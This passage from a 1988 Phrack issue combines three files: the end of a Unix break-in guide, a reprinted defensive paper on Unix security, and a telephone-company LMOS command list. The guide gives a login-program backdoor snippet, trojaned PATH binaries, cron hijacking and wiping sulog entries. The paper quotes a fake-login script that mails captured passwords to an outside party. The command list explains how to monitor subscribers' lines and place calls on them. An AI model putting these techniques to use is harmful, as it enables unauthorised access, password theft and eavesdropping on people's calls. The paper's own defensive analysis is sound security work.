lasttimedone will be ran as that file's owner. Cron: in /usr/spool/cron/cronjobs, there are a list of people running cron jobs. Cat root's, and see if he runs any of the programs owned by you (Without doing a su xxx -c "xxx"). For matter, check all the crons. If you can take one system login, you should be able to get the rest, in time. -The disk files. These are rather odd. If you have read permission on the disks in /dev, then you can read any file on the system. All you have to do is find it in there somewhere. If the disk is writeable, if you use /etc/fsbd, you can modify any file on the system into whatever you want, such as by changing the permissions on /bin/sh to 4555. Since this is pretty difficult to understand (and I don't get it fully), then I won't bother with it any more. -Trivial su. You know with su you can log into anyone else's account if you know their passwords or if you're root. There are still a number of system 5's that have uid 0, null passwd, rsh accounts on them. Just be sure to remove your entry in /usr/adm/sulog. -Trojan horses? On Unix? Yes, but because of the shell variable PATH, we are generally out of luck, because it usually searches /bin and /usr/bin first. However, if the first field is a colon, files in the present directory are searched first. Which means if you put a modified version of 'ls' there, hey. If this isn't the case, you will have to try something more blatant, like putting it in a game (see Shooting Shark's file a while back). If you have a system login, you may be able to get something done like that. See cron. Taking over: Once you have root privs, you should read all the mail in /usr/mail, just to sure nothing interesting is up, or anyone is passing another systems passwds about. You may want to add another entry to the passwd file, but that's relatively dangerous to the life of your machine. Be sure not to have anything out of the ordinary as the entry (i.e., No uid 0). Get a copy of the login program (available at your nearest decent BBS, I hope) of that same version of Unix, and modify it a bit: on system 5, here's a modification pretty common: in the routine to check correct passwds, on the line before the actual pw check, put a if (!(strcmp(pswd,"woof"))) return(1); to check for your 'backdoor', enabling you to log on as any valid user that isn't uid 0 (On system 5). Neato things: -Have you ever been on a system that you couldn't get root or read the Systems/L.sys file? Well, this is a cheap way to overcome it: 'uuname' will list all machines reachable by your Unix, then (Assuming they aren't Direct, and the modem is available): $ cu -d host.you.want [or] $ uucico -x99 -r1 -shost.you.want Both will do about the same for us. This will fill your screen with lots of trivial material, but will eventually get to the point of printing the phone number to the other system. -d enables the cu diagnostics, -x99 enables the uucico highest debug, and -R1 says 'uucp master'. Back a year or two, almost everywhere had their uucp passwd set to the same thing as their nuucp passwd (Thanks to the Systems file), so it was a breeze getting in. Even nowadays, some places do it.. You never can tell. -Uucp: I personally don't like the uucp things. Uucico and uux are limited by the Permissions file, and in most cases, that means you can't do anything except get & take from the uucppublic dirs. Then again, if the permission/L.cmd is blank, you should be able to take what files that you want. I still don't like it. -Sending mail: Sometimes, the mail program checks only the shell var LOGNAME, so change it, export it, and you may be able to send mail as anyone. (Mainly early system 5's.) $ LOGNAME="root";export LOGNAME -Printing out all the files on the system: Useful if you're interested in the filenames. $ find / -print >file_list& And then do a 'grep text file_list' to find any files with 'text' in their names. Like grep [.]c file_list, grep host file_list.... -Printing out all restricted files: Useful when you have root. As a normal user, do: $ find / -print >/dev/null& This prints out all nonaccessable directories, so become root and see what they are hiding. -Printing out all the files in a directory: Better looking than ls -R: $ find . -print It starts at the present dir, and goes all the way down. Catches all '.files', too. -Rsh: Well in the case of having an account with rsh only, check your 'set'. If SHELL is not /bin/sh, and you are able to run anything with a shell escape (ex, ed, vi, write, mail...), you should be put into sh if you do a '!sh'. If you have write permission on your .profile, change it, because rsh is ran after checking profile. -Humor: On a system 5, do a: $ cat "food in cans" or on a csh, do: % hey unix, got a match? Well, I didn't say it was great. Password hacking: -Salt: In a standard /etc/passwd file, passwords are 13 characters long. This is an 11 char encrypted passwd and a 2 char encryption modifier (salt), which is used to change the des algorithm in one of 4096 ways. Which means there is no decent way to go and reverse hack it. Yet. On normal system 5 Unix, passwords are supposed to be 6-8 characters long and have both numeric and alphabetic characters in them, which makes a dictionary hacker pretty worthless. However, if a user keeps insisting his password is going to be 'dog,' usually the system will comply (depending on version). I have yet to try it, but having the hacker try the normal entry, and then the entry terminated by [0-9] is said to have remarkable results, if you don't mind the 10-fold increase in time. Final notes: Yes, I have left a lot out. That seems to be the rage nowadays.. If you have noticed something wrong, or didn't like this, feel free to tell me. If you can find me. ------------------------------------------------------------------------------- Hi Ho. Here ends part one. ------------------------------------------------------------------------------- Produced and directed by: Urvile & Necron 99 ----------------------------------------------------------- (c) ToK inc., 1988 ==Phrack Inc.== Volume Two, Issue 18, Phile #7 of 11 +--------------------------------------+ | "Unix System Security Issues" | | Typed by: | | Whisky | | (from Holland, Europe) | +--------------------------------------+ | From | | Information Age | | Vol. 11, Number 2, April 1988 | | Written By: | | Michael J. Knox and Edward D. Bowden | +--------------------------------------+ Note: This file was sent to me from a friend in Holland. I felt that it would be a good idea to present this file to the UNIX-hacker community, to show that hackers don't always harm systems, but sometimes look for ways to secure flaws in existing systems. -- Jester Sluggo !! There are a number of elements that have lead to the popularity of the Unix operating system in the world today. The most notable factors are its portability among hardware platforms and the interactive programming environment that it offers to users. In fact, these elements have had much to do with the successful evolution of the Unix system in the commercial market place. (1, 2) As the Unix system expands further into industry and government, the need to handle Unix system security will no doubt become imperative. For example, the US government is committing several million dollars a year for the Unix system and its supported hardware. (1) The security requirements for the government are tremendous, and one can only guess at the future needs of security in industry. In this paper, we will cover some of the more fundamental security risks in the Unix system. Discussed are common causes of Unix system compromise in such areas as file protection, password security, networking and hacker violations. In our conclusion, we will comment upon ongoing effects in Unix system security, and their direct influence on the portability of the Unix operating system. FILE AND DIRECTORY SECURITY In the Unix operating system environment, files and directories are organized in a tree structure with specific access modes. The setting of these modes, through permission bits (as octal digits), is the basis of Unix system security. Permission bits determine how users can access files and the type of access they are allowed. There are three user access modes for all Unix system files and directories: the owner, the group, and others. Access to read, write and execute within each of the usertypes is also controlled by permission bits (Figure 1). Flexibility in file security is convenient, but it has been criticized as an area of system security compromise. Permission modes OWNER GROUP OTHERS ------------------------------------------------------------ rwx : rwx : rwx ------------------------------------------------------------ r=read w=write x=execute -rw--w-r-x 1 bob csc532 70 Apr 23 20:10 file drwx------ 2 sam A1 2 May 01 12:01 directory FIGURE 1. File and directory modes: File shows Bob as the owner, with read and write permission. Group has write permission, while Others has read and execute permission. The directory gives a secure directory not readable, writeable, or executable by Group and Others. Since the file protection mechanism is so important in the Unix operating system, it stands to reason that the proper setting of permission bits is required for overall security. Aside from user ignorance, the most common area of file compromise has to do with the default setting of permission bits at file creation. In some systems the default is octal 644, meaning that only the file owner can write and read to a file, while all others can only read it. (3) In many "open" environments this may be acceptable. However, in cases where sensitive data is present, the access for reading by others should be turned off. The file utility umask does in fact satisfy this requirement. A suggested setting, umask 027, would enable all permission for the file owner, disable write permission to the group, and disable permissions for all others (octal 750). By inserting this umask command in a user .profile or .login file, the default will be overwritten by the new settings at file creation. The CHMOD utility can be used to modify permission settings on files and directories. Issuing the following command, chmod u+rwd,g+rw,g-w,u-rwx file will provide the file with the same protection as the umask above (octal 750). Permission bits can be relaxed with chmod at a later time, but at least initially, the file structure can be made secure using a restrictive umask. By responsible application of such utilities as umask and chmod, users can enhance file system security. The Unix system, however, restricts the security defined by the user to only owner, group and others. Thus, the owner of the file cannot designate file access to specific users. As Kowack and Healy have pointed out, "The granularity of control that (file security) mechanisms is often insufficient in practice (...) it is not possible to grant one user write protection to a directory while granting another read permission to the same directory. (4) A useful file security file security extension to the Unix system might be Multics style access control lists. With access mode vulnerabilities in mind, users should pay close attention to files and directories under their control, and correct permissions whenever possible. Even with the design limitations in mode granularity, following a safe approach will ensure a more secure Unix system file structure. SUID and SGID The set user id (suid) and set group id (sgid) identify the user and group ownership of a file. By setting the suid or sgid permission bits of an executable file, other users can gain access to the same resources (via the executable file) as that of the real file's owner. For Example: Let Bob's program bob.x be an executable file accessible to others. When Mary executes bob.x, Mary becomes the new program owner. If during program execution bob.x requests access to file browse.txt, then Mary must have previous read or write permission to browse.txt. This would allow Mary and everyone else total access to the contents of browse.txt, even when she is not running bob.x. By turning on the suid bit of bob.x, Mary will have the same access permissions to browse.txt as does the program's real owner, but she will only have access to browse.txt during the execution of bob.x. Hence, by incorporating suid or sgid, unwelcome browsers will be prevented from accessing files like browse.txt. Although this feature appears to offer substantial access control to Unix system files, it does have one critical drawback. There is always the chance that the superuser (system administrator) may have a writable file for others that is also set with suid. With some modification in the file's code (by a hacker), an executable file like this would enable a user to become a superuser. Within a short period of time this violator could completely compromise system security and make it inaccessible, even to other superusers. As Farrow (5) puts it, "(...) having a set-user-id copy of the shell owned by root is better than knowing the root password". To compensate for this security threat, writable suid files should be sought out and eliminated by the system administrator. Reporting of such files by normal users is also essential in correcting existing security breaches. DIRECTORIES Directory protection is commonly overlooked component of file security in the Unix system. Many system administrators and users are unaware of the fact, that "publicly writable directories provide the most opportunities for compromising the Unix system security" (6). Administrators tend to make these "open" for users to move around and access public files and utilities. This can be disastrous, since files and other subdirectories within writable directories can be moved out and replaced with different versions, even if contained files are unreadable or unwritable to others. When this happens, an unscrupulous user or a "password breaker" may supplant a Trojan horse of a commonly used system utility (e.g. ls, su, mail and so on). For example, imagine For example: Imagine that the /bin directory is publicly writable. The perpetrator could first remove the old su version (with rm utility) and then include his own fake su to read the password of users who execute this utility. Although writable directories can destroy system integrity, readable ones can be just as damaging. Sometimes files and directories are configured to permit read access by other. This subtle convenience can lead to unauthorized disclosure of sensitive data: a serious matter when valuable information is lost to a business competitor. As a general rule, therefore, read and write access should be removed from all but system administrative directories. Execute permission will allow access to needed files; however, users might explicitly name the file they wish to use. This adds some protection to unreadable and unwritable directories. So, programs like lp file.x in an unreadable directory /ddr will print the contents of file.x, while ls/ddr would not list the contents of that directory. PATH VARIABLE PATH is an environment variable that points to a list of directories, which are searched when a file is requested by a process. The order of that search is indicated by the sequence of the listed directories in the PATH name. This variable is established at user logon and is set up in the users .profile of .login file. If a user places the current directory as the first entry in PATH, then programs in the current directory will be run first. Programs in other directories with the same name will be ignored. Although file and directory access is made easier with a PATH variable set up this way, it may expose the user to pre-existing Trojan horses. To illustrate this, assume that a Trojan horse, similar to the cat utility, contains an instruction that imparts access privileges to a perpetrator. The fake cat is placed in a public directory /usr/his where a user often works. Now if the user has a PATH variable with the current directory first, and he enters the cat command while in /usr/his, the fake cat in /usr/his would be executed but not the system cat located in /bin. In order to prevent this kind of system violation, the PATH variable must be correctly set. First, if at all possible, exclude the current directory as the first entry in the PATH variable and type the full path name when invoking Unix system commands. This enhances file security, but is more cumbersome to work with. Second, if the working directory must be included in the PATH variable, then it should always be listed last. In this way, utilities like vi, cat, su and ls will be executed first from systems directories like /bin and /usr/bin before searching the user's working directory. PASSWORD SECURITY User authentication in the Unix system is accomplished by personal passwords. Though passwords offer an additional level of security beyond physical constraints, they lend themselves to the greatest area of computer system compromise. Lack of user awareness and responsibility contributes largely to this form of computer insecurity. This is true of many computer facilities where password identification, authentication and authorization are required for the access of resources - and the Unix operating system is no exception. Password information in many time-sharing systems are kept in restricted files that are not ordinarily readable by users. The Unix system differs in this respect, since it allows all users to have read access to the /etc/passwd file (FIGURE 2) where encrypted passwords and other user information are stored. Although the Unix system implements a one-way encryption method, and in most systems a modified version of the data encryption standard (DES), password breaking methods are known. Among these methods, brute-force attacks are generally the least effective, yet techniques involving the use of heuristics (good guesses and knowledge about passwords) tend to be successful. For example, the /etc/passwd file contains such useful information as the login name and comments fields. Login names are especially rewarding to the "password breaker" since many users will use login variants for passwords (backward spelling, the appending of a single digit etc.). The comment field often contains items such as surname, given name, address, telephone number, project name and so on. To quote Morris and Grampp (7) in their landmark paper on Unix system security: [in the case of logins] The authors made a survey of several dozen local machines, using as trial passwords a collection of the 20 most common female first names, each followed by a single digit. The total number of passwords tried was, therefore, 200. At least one of these 200 passwords turned out to be a valid password on every machine surveyed. [as for comment fields] (...) if an intruder knows something about the people using a machine, a whole new set of candidates is available. Family and friend's names, auto registration numbers, hobbies, and pets are particularly productive categories to try interactively in the unlikely event that a purely mechanical scan of the password file turns out to be disappointing. Thus, given a persistent system violator, there is a strong evidence, that he will find some information about users in the /etc/passwd file. With this in mind, it is obvious that a password file should be unreadable to everyone except those in charge of system administration. root:aN2z06ISmxKqQ:0:10:(Boss1),656-35-0989:/:/bin mike:9okduHy7sdLK8:09:122:No.992-3943:/usr:/bin FIGURE 2. The /etc/passwd file. Note the comments field as underlined terms. Resolution of the /etc/passwd file's readability does not entirely solve the basic problem with passwords. Educating users and administrators is necessary to assure proper password utilization. First, "good passwords are those that are at least six characters long, aren't based on personal information, and have some non-alphabetic (especially control) characters in them: 4score, my_name, luv2run" (8). Secondly, passwords should be changed periodically but users should avoid alternating between two passwords. Different passwords for different machines and files will aid in protecting sensitive information. Finally, passwords should never be available to unauthorized users. Reduction of user ignorance about poor password choice will inevitably make a system more secure. NETWORK SECURITY UUCP system The most common Unix system network is the UUCP system, which is a group of programs that perform the file transfers and command execution between remote systems. (3) The problem with the UUCP system is that users on the network may access other users' files without access permission. As stated by Nowitz (9), The uucp system, left unrestricted, will let any outside user execute commands and copy in/out any file that is readable/writable by a uucp login user. It is up to the individual sites to be aware of this, and apply the protections that they feel free are necessary. This emphasizes the importance of proper implementation by the system administrator. There are four UUCP system commands to consider when looking into network security with the Unix system. The first is uucp, a command used to copy files between two Unix systems. If uucp is not properly implemented by the system administrator, any outside user can execute remote commands and copy files from another login user. If the file name on another system is known, one could use the uucp command to copy files from that system to their system. For example: %uucp system2!/main/src/hisfile myfile will copy hisfile from system2 in the directory /main/src to the file myfile in the current local directory. If file transfer restrictions exist on either system, hisfile would not be sent. If there are no restrictions, any file could be copied from a remote user - including the password file. The following would copy the remote system /etc/passwd file to the local file thanks: %uucp system2!/etc/passwd thanks System administrators can address the uucp matter by restricting uucp file transfers to the directory /user/spool/uucppublic. (8) If one tries to transfer a file anywhere else, a message will be returned saying "remote access to path/file denied" and no file transfer will occur. The second UUCP system command to consider is the uux. Its function is to execute commands on remote Unix computers. This is called remote command execution and is most often used to send mail between systems (mail executes the uux command internally). The ability to execute a command on another system introduces a serious security problem if remote command execution is not limited. As an example, a system should not allow users from another system to perform the following: %uux "system1!cat/usr/spool/uucppublic" which would cause system1 to send its /etc/passwd file to the system2 uucp public directory. The user of system2 would now have access to the password file. Therefore, only a few commands should be allowed to execute remotely. Often the only command allowed to run uux is rmail, the restricted mail program. The third UUCP system function is the uucico (copy in / copy out) program. It performs the true communication work. Uucp or uux does not actually call up other systems; instead they are queued and the uucico program initiates the remote processes. The uucico program uses the file /usr/uucp/USERFILE to determine what files a remote system may send or receive. Checks for legal files are the basis for security in USERFILE. Thus the system administrator should carefully control this file. In addition, USERFILE controls security between two Unix systems by allowing a call-back flag to be set. Therefore, some degree of security can be achieved by requiring a system to check if the remote system is legal before a call-back occurs. The last UUCP function is the uuxqt. It controls the remote command execution. The uuxqt program uses the file /usr/lib/uucp/L.cmd to determine which commands will run in response to a remote execution request. For example, if one wishes to use the electronic mail feature, then the L.cmd file will contain the line rmail. Since uuxqt determines what commands will be allowed to execute remotely, commands which may compromise system security should not be included in L.cmd. CALL THE UNIX SYSTEM In addition to UUCP network commands, one should also be cautious of the cu command (call the Unix system). Cu permits a remote user to call another computer system. The problem with cu is that a user on a system with a weak security can use cu to connect to a more secure system and then install a Trojan horse on the stronger system. It is apparent that cu should not be used to go from a weaker system to a stronger one, and it is up to the system administrator to ensure that this never occurs. LOCAL AREA NETWORKS With the increased number of computers operating under the Unix system, some consideration must be given to local area networks (LANs). Because LANs are designed to transmit files between computers quickly, security has not been a priority with many LANs, but there are secure LANs under development. It is the job of the system manager to investigate security risks when employing LANs. OTHER AREAS OF COMPROMISE There are numerous methods used by hackers to gain entry into computer systems. In the Unix system, Trojan horses, spoofs and suids are the primary weapons used by trespassers. Trojan horses are pieces of code or shell scripts which usually assume the role of a common utility but when activated by an unsuspecting user performs some unexpected task for the trespasser. Among the many different Trojan horses, it is the su masquerade that is the most dangerous to the Unix system. Recall that the /etc/passwd file is readable to others, and also contains information about all users - even root users. Consider what a hacker could do if he were able to read this file and locate a root user with a writable directory. He might easily plant a fake su that would send the root password back to the hacker. A Trojan horse similar to this can often be avoided when various security measures are followed, that is, an etc/passwd file with limited read access, controlling writable directories, and the PATH variable properly set. A spoof is basically a hoax that causes an unsuspecting victim to believe that a masquerading computer function is actually a real system operation. A very popular spool in many computer systems is the terminal-login trap. By displaying a phoney login format, a hacker is able to capture the user's password. Imagine that a root user has temporarily deserted his terminal. A hacker could quickly install a login process like the one described by Morris and Grampp (7): echo -n "login:" read X stty -echo echo -n "password:" read Y echo "" stty echo echo %X%Y|mail outside|hacker& sleep 1 echo Login incorrect stty 0>/dev/tty We see that the password of the root user is mailed to the hacker who has completely compromised the Unix system. The fake terminal-login acts as if the user has incorrectly entered the password. It then transfers control over to the stty process, thereby leaving no trace of its existence. Prevention of spoofs, like most security hazards, must begin with user education. But an immediate solution to security is sometimes needed before education can be effected. As for terminal-login spoofs, there are some keyboard-locking programs that protect the login session while users are away from their terminals. (8, 10) These locked programs ignore keyboard-generated interrupts and wait for the user to enter a password to resume the terminal session. Since the suid mode has been previously examined in the password section, we merely indicate some suid solutions here. First, suid programs should be used is there are no other alternatives. Unrestrained suids or sgids can lead to system compromise. Second, a "restricted shell" should be given to a process that escapes from a suid process to a child process. The reason for this is that a nonprivileged child process might inherit privileged files from its parents. Finally, suid files should be writable only by their owners, otherwise others may have access to overwrite the file contents. It can be seen that by applying some basic security principles, a user can avoid Trojan horses, spoofs and inappropriate suids. There are several other techniques used by hackers to compromise system security, but the use of good judgement and user education may go far in preventing their occurrence. CONCLUSION Throughout this paper we have discussed conventional approaches to Unix system security by way of practical file management, password protection, and networking. While it can be argued that user education is paramount in maintaining Unix system security (11) factors in human error will promote some degree of system insecurity. Advances in protection mechanisms through better-written software (12), centralized password control (13) and identification devices may result in enhanced Unix system security. The question now asked applies to the future of Unix system operating. Can existing Unix systems accommodate the security requirements of government and industry? It appears not, at least for governmental security projects. By following the Orange Book (14), a government graded classification of secure computer systems, the Unix system is only as secure as the C1 criterion. A C1 system, which has a low security rating (D being the lowest) provides only discretionary security protection (DSP) against browsers or non-programmer users. Clearly this is insufficient as far as defense or proprietary security is concerned. What is needed are fundamental changes to the Unix security system. This has been recognized by at least three companies, AT&T, Gould and Honeywell (15, 16, 17). Gould, in particular, has made vital changes to the kernel and file system in order to produce a C2 rated Unix operating system. To achieve this, however, they have had to sacrifice some of the portability of the Unix system. It is hoped that in the near future a Unix system with an A1 classification will be realized, though not at the expense of losing its valued portability. REFERENCES 1 Grossman, G R "How secure is 'secure'?" Unix Review Vol 4 no 8 (1986) pp 50-63 2 Waite, M et al. "Unix system V primer" USA (1984) 3 Filipski, A and Hanko, J "Making Unix secure" Byte (April 1986) pp 113-128 4 Kowack, G and Healy, D "Can the holes be plugged?" Computerworld Vol 18 (26 September 1984) pp 27-28 5 Farrow, R "Security issues and strategies for users" Unix/World (April 1986) pp 65-71 6 Farrow, R "Security for superusers, or how to break the Unix system" Unix/World (May 1986) pp 65-70 7 Grampp, F T and Morris, R H "Unix operating system security" AT&T Bell Lab Tech. J. Vol 63 No 8 (1984) pp 1649-1672 8 Wood, P H and Kochan, S G "Unix system security" USA (1985) 9 Nowitz, D A "UUCP Implementation description: Unix programmer's manual Sec. 2" AT&T Bell Laboratories, USA (1984) 10 Thomas, R "Securing your terminal: two approaches" Unix/World (April 1986) pp 73-76 11 Karpinski, D "Security round table (Part 1)" Unix Review (October 1984) p 48 12 Karpinski, D "Security round table (Part 2)" Unix Review (October 1984) p 48 13 Lobel, J "Foiling the system breakers: computer security and access control" McGraw-Hill, USA (1986) 14 National Computer Security Center "Department of Defense trusted computer system evaluation criteria" CSC-STD-001-83, USA (1983) 15 Stewart, F "Implementing security under Unix" Systems&Software (February 1986) 16 Schaffer, M and Walsh, G "Lock/ix: An implementation of Unix for the Lock TCB" Proceedings of USENIX (1988) 17 Chuck, F "AT&T System 5/MLS Product 14 Strategy" AT&T Bell Labs, Government System Division, USA (August 1987) ============================================================================== ==Phrack Inc.== Volume Two, Issue 18, Phile #8 of 11 Control C and The Tribunal of Knowledge presents... LMOS (Loop Maintenance Operation System) -A List of Commands- This file contains what to our knowledge are the best things to do on LMOS. We were really vague due to the great power of the information provided in this file. You now know the commands so we will not go into (either in this file or when talking to us) how to use this information, it is up to you to figure out how to use it. +: Increase the voice volume on a line + lets you increase the volume when you are talking on or monitoring a sub-scriber's line over a callback path. The volume is increased because MLT adds amplifier to the line. + may be used after a mon, talk, rev, talkin or call request. Sometimes MLT adds an amplifier automatically to a long line. You will not know it is there so if you try to add amplification, a + will appear in the status sections but the voices will not get any louder because they are already loud as possible. -: Decrease the voice volume on a line - lets you decrease the volume when you are talking on or monitoring a subscriber's line over a callback path. The volume is decreased because MLT removes amplifier from the line. - may be used to remove amplifier that you have placed on the line with the + request, or amplifier that MLT has automatically places on a long line. The main reason to remove the amplifier is because it can sometimes cause a shrill or howl. Call: Make a call on a subscriber's line Call lets you use your touch-tone pad to dial any number you want using the customer's line circuit. It does this by simulating an off-hook condition in order to draw dial tone. A callback number is a required entry on the tv mask and an mdf access is required for calling out (except in SXS and panel offices). You can use a call when: 1) You want to know the TN for a known CA & PR - you would call TSPS or ANI. 2) Calls cannot be completed to a TN - you would call that TN. 3) To monitor dial tone on a customer's line. Callrd: Make a call on a dial pulse line circuit Callrd lets you use your touch-tone pad to dial using the customer's rotary dial line circuit. MLT does this by translating tones on a customer's line. mdf access is required for calling out (except in SXS, DMS10, DMS100, and DMS100AC offices). Use a callrd if you want to know the TN for a known CA & PR - you would call TSPS or ANI. Ccol: Collect coins using coin relay Ccol attempts to collect any coins that are in the hopper of a coin telephone set by operating the coin relay. Ccol does not check the totalizer or check the rest of the line. The results tell you only about relay operation, speed, and the current that is necessary to operate it. A ver code is not returned by ccol. You must have access to the line before your request ccol. You will use ccol most often when you are talking to a repair person who is trying to fix a coin phone. Channel: Run enhanced channel tests on DLC lines Chan or channel runs channel isolation tests and tells you if you have a bad COT or RT channel unit. Use this request to run enhanced channel tests on lines served by digital loop carriers such as SLC Series 5. Chan can only be run if there is special equipment in the co you're testing in. If you are testing a non-locally switched line with the SSA request, channel tests must be run separately with this request. Chan may also be used to run channel isolation tests on switched lines from the tv or stv mask, but these tests are included when you do a full or loop on a switched line. Change: Change status information Change allows you to change cable, pair or comment information that is displayed without having to request a test or any other type of information. the permanent line record information is not changed. To request a change, enter "change" in the req field of the tv and enter the change of information. Chome: Home totalizer on a coin telephone Chome attempts to return a totalizer to the starting position (home) for counting coins. The totalizer counts the coins and sends a tone back to the co for every 5 cents deposited. If it is not homed, coins can't be deposited. A chome request tells you whether the totalizer was homed, how many tones were sent to the co, and the current that was used to home the totalizer. A line must already be accessed to request a chome. Chome is often used when a repair person is trying to fix a coin telephone. Co: Test the central office equipment Co initiates a series of tests on the subscriber's line circuit. Co can be requested using either a no-test or an MDF trunk. A no-test access connects you to the entire loop but a co request tests only the inside portion. An MDF access is only connected to the inside portion of the loop. The outside portion is physically disconnected. Use a no-test access when you are fairly sure the trouble is inside the central office. Use a co on an MDF access when you are not sure where the trouble is. Coin: Test a coin telephone set Coin initiates a full series of tests on a telephone line. The station set, the totalizer, the coin relay, the loop and the co equipment are checked. If the coin request finds something wrong with either the totalizer or the relay, it stops testing and tells you the trouble is in the set. If it finds nothing wrong, it runs the full entries of tests. Coin may be used when a repair person is trying to fix a coin telephone. If a coin phone is newly installed, coin will check the set even though there is no line record. Cret: Operate coin relay to return coins Cret attempts to return any coins that may be lodged in the hopper of a coin telephone set. It operates the coin relay so that it will return the coins. It tries to return them 3 times before giving up. If it is successful, it also checks the speed of the relay. It does not check the totalizer or the rest of the line. You should have access to the line before you request a cret. You will use cret primarily when you are talking to a repair person who is trying to repair coin telephone. Cset: Check totalizer and relay in coinset Cset checks the totalizer and the coin relay in a coin telephone set. The totalizer is the mechanism in the phone that counts deposited coins and sends a tone back to the co for every 5 cents that is deposited. The relay is the mechanism that either returns or collects the coins that are deposited. Cset does not check the co or loop parts of the line. Cset can be used when you are talking to a repair person who is fixing a coin telephone. Dial: Test a subscriber's rotary dial Dial checks the subscriber's rotary dial. You must be in contact with the subscriber,either over a callback path or over a ddd line. For the dial request to work correctly, tell the subscriber to dial a "0" after hearing brief dial tone. The results of a dial request tell you whether the dial is okay or not, whether the dial speed is okay and what the speed is, and whether the break is okay and what the break is. Use the dial request when you suspect a problem with the telephone set. The trouble report could be "Can't call out' or 'Gets wrong numbers", for example. Dtout: Test a pbx line circuit Dtout initiates a series of tests on a pbx line circuit. Dtout must be requested using an MDF trunk. It is used to draw dial tone and check the arrangement of the pbx line circuit. Use dtout when you need to check the condition of special service circuits that do not use central office switches. Full: Test the entire telephone line Full starts a series of tests that do an extensive analysis of the entire line. This includes both the inside and outside portions. Many individual tests are run and the most important results are displayed in the summary message. Outside, MLT checks for AC and DC faults. Inside, it checks the line circuit and dial tone. The results may also include many other types of information about the line. You might request full line test when you first access a line or when you need to know a lot about a line. Grm: Get fast ground resistance measurement Grm gives you a quick measurement of the DC resistance of the ground path from the strap to the test hardware. Before you do a grm, have the repair person strap the tip and ring wires to ground. If this isn't done, grm will give you incorrect values. The line must be accessed before you do a grm request. You can use grm when you are talking to a repair person who is fixing a coinset. The resistance values obtained from a grm can be compared to old resistance values that are stored inside each coinset. Help: List the valid tv requests Help returns a list of all of the valid requests used in MLT-2. Help can be used when you are not sure which request to use in a particular situation, or when you can't remember an exact request name. For example, the correct entry to reverse polarity on a touch-tone line is "Rev.", help will tell you this. For a description of any specific request, enter the name of the request followed by a question mark. Info: Get general information about a line Info gives you the wire center name and the location of the frame; the exchange key, MDF group and MDF trunk numbers associated with the subscriber's line; the telephone number at the appropriate frame; and the assignment telephone number. You can get information about a whole telephone number, an NPA-NXX-, or an exchange key. MLT does not access the line when you request info, but it keeps access if you already have it. If there are multiple frames in an office, MLT give you information about all of them. Keep: Keep an access that you already have Keep lets you hold access to a no-test or MDF trunk that is about to "timeout." MLT keeps track of which trunks you have accessed but have not used for a while. MLT will automatically drop the access for you after a certain period of time. About 2 minutes before dropping the access, MLT gives you a warning message and also highlights the status line that will be dropped. If you want to keep the access, you should enter "keep" in the req field and the tn or line number of the access to be held. To drop an access when your are finished with it, enter an x in the req field. Lin: Test the inside part of the loop Lin starts a series of tests on the inside portion of a line. Lin includes the same tests as the loop test and can identify a co line circuit if one is present. Lin does not do the regular line circuit and draw and break dial tone tests. An MDF access is required for a lin request. You can use lin to test special circuit that do not use co switching machine. For example, if the circuit has 2 loops connected at the frame, lin lets you look at the second loop (both full and loop only test toward one loop). Lloop: Run the long loop analysis on the outside or loop part of a line The ll request starts a series of tests which do extensive analysis of the outside portion of the subscriber's line. It is specifically designed to handle cases that the regular loop request was not designed to handle. These cases include very long loops (over 100,000 feet) and multiparty lines on moderate-to-very-long loops. It does similar measurements to those that loop does, but analyzes the results differently. It expects to see a loop that has no dc faults or only very light dc faults. If you use a loop on lloop on a loop that has serious dc faults it will not do the long loop analysis. Loc1: Measure distance to 1-sided resistive fault Loc1 gets MLT to measure how far a one-sided fault is from the repair person, because telephone lines can be very long, it can be difficult for a repair person to find the location of a resistive fault. You can use loc1 to help the repair person have 1-sided fault. You should be in contact with the repair person on a line other than the one being measured. Have the repair person open the pr at a ready-access point beyond the fault if possible. Ask him/her to strap the pr tip to ring. Remember to enter a temperature on the tv mask before you transmit the loc1 request. Loc2: Measure distance to 2-sided resistive fault Loc2 gets MLT to measure how far a two-sided fault is from the repair person. Remember that you must run a locgp before you run a loc2 and that you must be in contact with the repair-person on a line other than the one you will be measuring. The repair-person must connect the bad pair to the good pair in a specific way, the exact method to use is explained in the results of the locgp request. Logcp and loc2 can also be used to sectionalize a one-sided resistive fault. Remember to enter a temperature on the tv mask before you transmit the loc2 request. Look: Look for an intentional fault Look is used to identify a fault, usually a short or ground, that has been placed on the line by the repair person. Look can be used when a repair person is having trouble locating a particular line. Look gets MLT to monitor the line that the repair person is looking for. When the repair person shorts or grounds the line, mlt sends a tone to you over your headset. You can tell the repair person that you "see the short". A callback path is required for a look request. You should talk to the repair person on a line other than the one you are working on. Lookin: Look for an intentional fault on a special services line Lookin is used to identify a fault, usually a short or ground, that has been placed on the special services line by the technician. Lookin is used to locate a particular line by having MLT monitor the line that the repair person is looking for. When the repair person shorts or grounds the line, MLT sends a tone to you over your headset. You can tell the repair person that you "See the short." A callback path is required for a lookin quest. You should talk to the repair person on a line other than the one you are working on. MDF access is required. Loop: Test the outside part of the loop Loop starts a series of tests that do an extensive analysis of the outside portion of the line. Loop does every test that full does except the line circuit and draw and break dial tone tests. Loop can be requested using either a no-test or an MDF trunk. A no-test access connects you to the entire line but a loop request tests only the outside portion. An MDF access is only connect to the outside portion. Use a no-test trunk when you are fairly sure the trouble is out of the co and an MDF when you are not sure. Lrm: Get fast loop resistance measurement lrm gives you a quick measurement of the DC resistance on a line. Lrm can't be run unless either the receiver is off-hook or the line is strapped tip to ring (an intentional short is placed on the line by the repair person). Also, MLT will not accept an lrm request if there is a hard ground on the line. Lrm does not access the line so you must already have access to do an lrm. You can use lrm when you are talking to a repair person who is fixing a coinset. The resistance values obtained from the lrm can be compared to the old resistance values that are stored inside each coinset. MDF(#): Access a specific MDF trunk MDF(#) lets you choose the MDF trunk that you want MLT to access. Use this request when an MDF trunk is connected to a telephone line at the MDF but is not connected to the loop testing system. This may occur in small offices where the frame attendant doesn't work for the entire day. You can also use this request when an MDF trunk has to be tested and repaired. The MDF entry must be a five character entry consisting of the wire center identifier and the trunk number. Mdf: Access a main distributing frame (MDF) MDF connects the mlt testing equipment to an MDF trunk. Before you can enter any requests, you must have the frame attendant connect the MDF trunk to the subscriber's line. Remember that MLT automatically accesses a no-test trunk unless you specifically request an MDF trunk. An MDF trunk goes directly from the loop testing system to the main distributing frame. Bypassing the central office switch. Using an MDF trunk allows you to test loops that are connect to co equipment that is not MLT-testable. Also, you can sectionalize a fault in or out of the co by testing "in" or "out" using MDF. MDF(gr): Access a trunk from a certain mdf trunk group MDF(gr) lets you choose the 